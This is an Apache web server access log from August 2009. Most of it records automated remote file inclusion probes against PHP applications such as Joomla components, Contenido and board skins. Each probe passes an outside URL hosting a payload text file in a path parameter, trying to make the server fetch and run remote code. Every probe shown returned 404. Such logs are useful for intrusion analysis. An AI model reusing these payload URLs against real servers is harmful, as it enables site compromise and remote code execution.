212.124.37.50 - - [03/Aug/2009:03:32:01 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:32:07 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:03:32:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.171.225.234 - - [03/Aug/2009:03:33:57 -0400] "GET /logs/access_log.Q109053100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:33:57 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:33:57 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:34:23 -0400] "GET /logs/access_log.Q109070800/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:35:56 -0400] "GET /logs/access_log.Q109071300/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:35:57 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:35:57 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:35:58 -0400] "GET /logs/access_log.Q109061300/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
207.210.126.218 - - [03/Aug/2009:03:36:12 -0400] "GET /logs/access_log.Q109051800//skin/uks_board_v1070/setup.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
207.210.126.218 - - [03/Aug/2009:03:36:12 -0400] "GET /logs//skin/uks_board_v1070/setup.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.210.126.218 - - [03/Aug/2009:03:36:12 -0400] "GET //skin/uks_board_v1070/setup.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
207.210.126.218 - - [03/Aug/2009:03:36:27 -0400] "GET /logs/access_log.Q109051300//skin/uks_board_v1070/setup.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.128.135.52 - - [03/Aug/2009:03:37:24 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:03:37:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.186.15.126 - - [03/Aug/2009:03:38:42 -0400] "GET //skin/uks_board_v1070/setup.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.186.15.126 - - [03/Aug/2009:03:38:42 -0400] "GET /logs//skin/uks_board_v1070/setup.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.186.15.126 - - [03/Aug/2009:03:38:42 -0400] "GET /logs/access_log.Q109051800//skin/uks_board_v1070/setup.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.120.237.150 - - [03/Aug/2009:03:38:57 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
91.186.15.126 - - [03/Aug/2009:03:39:00 -0400] "GET /logs/access_log.Q109051300//skin/uks_board_v1070/setup.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
59.24.49.35 - - [03/Aug/2009:03:41:00 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [03/Aug/2009:03:41:00 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
59.24.49.35 - - [03/Aug/2009:03:41:00 -0400] "GET /logs/access_log.Q109061300//contenido/external/frontend/news.php?cfg[path][includes]=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.120.237.150 - - [03/Aug/2009:03:41:46 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
209.59.12.99 - - [03/Aug/2009:03:42:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.175.2.122 - - [03/Aug/2009:03:43:34 -0400] "GET /logs///administrator/components/com_smf/includes/Lite.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:43:34 -0400] "GET ///administrator/components/com_smf/includes/Lite.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:43:34 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_smf/includes/Lite.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
59.24.49.35 - - [03/Aug/2009:03:43:38 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [03/Aug/2009:03:43:38 -0400] "GET /logs/access_log.Q109061300//contenido/external/frontend/news.php?cfg[path][includes]=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
59.24.49.35 - - [03/Aug/2009:03:43:38 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:44:01 -0400] "GET /logs/access_log.Q109052400%20%20///administrator/components/com_smf/includes/Lite.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:44:35 -0400] "GET //phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:44:48 -0400] "GET /logs//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:44:48 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:03:44:52 -0400] "GET //phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:03:44:55 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:45:08 -0400] "GET ///administrator/components/com_smf/includes/Lite.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:45:08 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_smf/includes/Lite.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:45:08 -0400] "GET /logs///administrator/components/com_smf/includes/Lite.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:45:28 -0400] "GET /logs/access_log.Q109052400///administrator/components/com_smf/includes/Lite.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:45:38 -0400] "GET //phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:45:38 -0400] "GET /logs//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:45:38 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:45:57 -0400] "GET //phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:45:57 -0400] "GET /logs//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:45:57 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:46:42 -0400] "GET /logs/access_log.Q109052300%20%20//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:47:08 -0400] "GET /logs/access_log.Q109052300%20%20//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:47:21 -0400] "GET /logs/access_log.Q109052300%20%20//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:47:30 -0400] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:47:30 -0400] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:47:30 -0400] "GET /logs/access_log.Q109060600/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:47:30 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:03:47:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [03/Aug/2009:03:47:49 -0400] "GET //phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:03:47:49 -0400] "GET /logs//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
201.232.54.48 - - [03/Aug/2009:03:47:49 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:48:00 -0400] "GET /logs/access_log.Q109060600/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:48:00 -0400] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:48:00 -0400] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:48:00 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:41 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:41 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:41 -0400] "GET /logs/access_log.Q109070300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:42 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:42 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:42 -0400] "GET /logs/access_log.Q109070300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:46 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:46 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:48:46 -0400] "GET /logs/access_log.Q109070300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:49:15 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_smf/admin.smf.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:49:15 -0400] "GET ///administrator/components/com_smf/admin.smf.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:49:15 -0400] "GET /logs///administrator/components/com_smf/admin.smf.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:49:39 -0400] "GET /logs/access_log.Q109052400%20%20///administrator/components/com_smf/admin.smf.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:49:59 -0400] "GET /logs/access_log.Q109060600%20%20/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:49:59 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:50:17 -0400] "GET /logs/access_log.Q109060600%20%20/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:03:50:17 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:50:25 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:50:25 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:50:25 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:50:25 -0400] "GET /logs/access_log.Q109061700//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.221.93.130 - - [03/Aug/2009:03:50:58 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
213.221.93.130 - - [03/Aug/2009:03:50:58 -0400] "GET //phphtml.php?htmlclass_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 210 "-" "libwww-perl/5.808"
213.221.93.130 - - [03/Aug/2009:03:50:58 -0400] "GET /logs//phphtml.php?htmlclass_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 215 "-" "libwww-perl/5.808"
69.175.2.122 - - [03/Aug/2009:03:51:07 -0400] "GET ///administrator/components/com_smf/admin.smf.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:51:07 -0400] "GET /logs///administrator/components/com_smf/admin.smf.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.175.2.122 - - [03/Aug/2009:03:51:07 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_smf/admin.smf.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
213.221.93.130 - - [03/Aug/2009:03:51:12 -0400] "GET /logs/error_log.Q109052400//phphtml.php?htmlclass_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
69.175.2.122 - - [03/Aug/2009:03:51:27 -0400] "GET /logs/access_log.Q109052400///administrator/components/com_smf/admin.smf.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
216.120.237.150 - - [03/Aug/2009:03:51:38 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:51:38 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:51:38 -0400] "GET /logs//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
209.59.12.99 - - [03/Aug/2009:03:52:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.149.105.8 - - [03/Aug/2009:03:54:06 -0400] "GET //bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:54:06 -0400] "GET /logs//bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:54:09 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
216.120.237.150 - - [03/Aug/2009:03:55:15 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
62.128.135.52 - - [03/Aug/2009:03:55:19 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:03:55:19 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:03:55:19 -0400] "GET /logs//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
213.149.105.8 - - [03/Aug/2009:03:55:28 -0400] "GET /logs/access_log.Q109072500%20%20//bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 341 "-" "Mozilla/5.0"
72.30.81.182 - - [03/Aug/2009:03:55:26 -0400] "GET /logs/error_log.Q109071900 HTTP/1.0" 200 2993552 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.149.105.8 - - [03/Aug/2009:03:55:46 -0400] "GET /logs/access_log.Q109072400%20%20//bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 341 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:55:50 -0400] "GET /logs/access_log.Q109051000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
81.92.219.219 - - [03/Aug/2009:03:55:51 -0400] "GET //skin/zero_vote/error.php?dir=http://www.adribessa.com//administrator/components/com_links/1? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
81.92.219.219 - - [03/Aug/2009:03:55:51 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.adribessa.com//administrator/components/com_links/1? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.92.219.219 - - [03/Aug/2009:03:55:51 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://www.adribessa.com//administrator/components/com_links/1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:03:56:22 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:03:56:22 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:03:56:22 -0400] "GET /logs/access_log.Q109060100%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.78.116.209 - - [03/Aug/2009:03:56:27 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://www.otr.co.kr/bbs/files/.dat/filesys/incoming/1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.116.209 - - [03/Aug/2009:03:56:27 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.otr.co.kr/bbs/files/.dat/filesys/incoming/1? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.116.209 - - [03/Aug/2009:03:56:27 -0400] "GET //skin/zero_vote/error.php?dir=http://www.otr.co.kr/bbs/files/.dat/filesys/incoming/1? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:56:38 -0400] "GET /logs/access_log.Q109051000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.30.81.182 - - [03/Aug/2009:03:56:40 -0400] "GET /index.htm HTTP/1.0" 200 870 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [03/Aug/2009:03:57:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
